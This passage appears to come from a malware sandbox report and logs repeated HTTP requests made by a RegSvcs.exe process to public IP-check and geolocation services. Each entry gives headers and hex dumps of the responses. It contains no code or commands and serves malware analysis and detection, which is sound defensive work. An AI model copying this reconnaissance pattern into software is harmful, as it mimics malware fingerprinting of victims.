                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  6192.168.2.849723193.122.130.0804780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 16, 2024 13:37:28.083249092 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 16, 2024 13:37:29.183563948 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 16 Dec 2024 12:37:29 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 138ba724a96b9efc89b68ec28f526023
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  7192.168.2.849725193.122.130.0804780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 16, 2024 13:37:31.004462004 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 16, 2024 13:37:32.101073980 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 16 Dec 2024 12:37:31 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: f7439651186c4c4d41159b3620646240
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  0192.168.2.849706104.21.67.1524434780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-16 12:37:10 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-16 12:37:10 UTC870INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 16 Dec 2024 12:37:10 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 362
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 341399
                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SEegHayPT3UxEQbB8MVuxV234dSFpuvfDR5z4u7krdvNeJZ97VJKZm5NRR17FULXs8R63MQwEQETbC0V7r1J5Ys985HDoY4Upf1zZcZlHEP1Bn95gUXGNh9iNoXQD8Zzm9pPsvxR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f2eb9268a2641f5-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1583&rtt_var=609&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1773997&cwnd=211&unsent_bytes=0&cid=5d61606ef27a7fab&ts=455&x=0"
                                                                                                                                  2024-12-16 12:37:10 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  1192.168.2.849707104.21.67.1524434780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-16 12:37:12 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  2024-12-16 12:37:12 UTC886INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 16 Dec 2024 12:37:12 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 362
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 341401
                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wfk6hnj3jmI2PyS2U%2BtoY1%2BQBV8QwNJ03IWwWrkjKD%2Fk1a5XHDo%2BflZXuul6iBor35o4Xkl87SYEd%2Fi3xVEt%2FEiADIpa92WmNMSSuZLHy3VW4Gfyc%2FuzEmkd%2B22Bl5UkDao0F8Sb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f2eb933289b5e86-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1702&min_rtt=1693&rtt_var=653&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1651583&cwnd=240&unsent_bytes=0&cid=d5ed44d40e6ab4c2&ts=455&x=0"
                                                                                                                                  2024-12-16 12:37:12 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  2192.168.2.849709104.21.67.1524434780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-16 12:37:15 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  2024-12-16 12:37:15 UTC882INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 16 Dec 2024 12:37:15 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 362
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 341404
                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f2zpBggZoECSfl%2B0GkTgjT%2FbHJm4o0ZrVIFiq8R6xAU4lorjs6eQX59DhXMXEBC849UGSRfq%2Bm5olgjjQrRgMg5bcJEQCDv%2F0H1%2B1CdL%2F99D6HCZgsOPpQbKzvOiPlafV45MBefb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f2eb9454aba43d5-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1576&rtt_var=604&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1793611&cwnd=241&unsent_bytes=0&cid=1238ece7d21c3962&ts=462&x=0"
                                                                                                                                  2024-12-16 12:37:15 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  3192.168.2.849711104.21.67.1524434780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-16 12:37:18 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-16 12:37:19 UTC881INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 16 Dec 2024 12:37:19 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 362
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 341408
                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wiwVZnR%2Fgaf4RKUDo3eespuSd9bs8fxWhocuGBkq%2FWXbnQnIVQgg2%2FsnGb5Fg3gCsS%2BfOKhABkM%2BvQ2CIbMzB%2BLvS04k3KbzlVRLzDJHF0TQaACjyaKDGgIXLBJoYbBH7eBetQbG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f2eb95a7ec40f3a-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1506&min_rtt=1506&rtt_var=753&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4238&recv_bytes=699&delivery_rate=187528&cwnd=164&unsent_bytes=0&cid=901b5eadf82c99d2&ts=467&x=0"
                                                                                                                                  2024-12-16 12:37:19 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  4192.168.2.849713104.21.67.1524434780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-16 12:37:21 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-16 12:37:22 UTC886INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 16 Dec 2024 12:37:22 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 362
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 341411
                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MQhFd%2B%2FrecEzNTOaGkKh4BSvBm9VWAX2O6QjZVdfgtwYxxDdoRG5%2F3oqOg5Ss2Of66z3AE%2BQli%2B%2F2uIQ9d25u87GlIcAYBkwcWcm4cyZ3uvSz5xM%2F%2BPVanUv2fIWMfiLHSOuxKL5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f2eb96c8b8443d9-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1601&rtt_var=618&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1746411&cwnd=221&unsent_bytes=0&cid=b7af28b97af3b459&ts=454&x=0"
                                                                                                                                  2024-12-16 12:37:22 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  5192.168.2.849717104.21.67.1524434780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-16 12:37:24 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-16 12:37:25 UTC878INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 16 Dec 2024 12:37:24 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 362
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 341413
                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M07Izq%2BN6Ltr9y61HC6h1gro0JF%2Bd%2FOFLvge57gAuMdHtS3J39uzCKPb2jqMCH6E9WOYbEdVaulyuIgL8cLk4ueqQoiSc%2BReDHSaR0Hf9RAmOxN4F6RRhLgxKZ7HImYEKKlgEHMv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f2eb97eab378cc0-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1813&min_rtt=1806&rtt_var=691&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1567364&cwnd=219&unsent_bytes=0&cid=2b888787a645696b&ts=456&x=0"
                                                                                                                                  2024-12-16 12:37:25 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  6192.168.2.849721104.21.67.1524434780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-16 12:37:27 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  2024-12-16 12:37:27 UTC874INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 16 Dec 2024 12:37:27 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 362
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 341416
                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0YgWlEDFVLUgi1TO0SbaZE9gp2mOO6wrG8QGuUL17pKAvTdZ%2B1EHsYPI2sMdPu75Munuu3%2FVFcNzEi60e6LzOj08ieIFsS6cqkCC334r7m2FqfxgHR7l6tABQzYucTMBeL0ICxFg"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f2eb990bc194225-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1583&rtt_var=594&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1841109&cwnd=235&unsent_bytes=0&cid=c928443becc101a2&ts=450&x=0"
                                                                                                                                  2024-12-16 12:37:27 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  7192.168.2.849724104.21.67.1524434780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-16 12:37:30 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-16 12:37:30 UTC876INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 16 Dec 2024 12:37:30 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 362
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 341419
                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6ALlHY5IAoj6S1uVmpKoof65dmUiYPnxVCf8ZIvPky6YUOkHbVJEVlirJB0gV0J%2F3QOOpHwJ1ezNyCi3kx19YlhIjF46Sfu5Zd6eMYQwjFYPla%2FEPI7W4euPbZfDo%2FIU34TP54CL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f2eb9a2f826434b-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
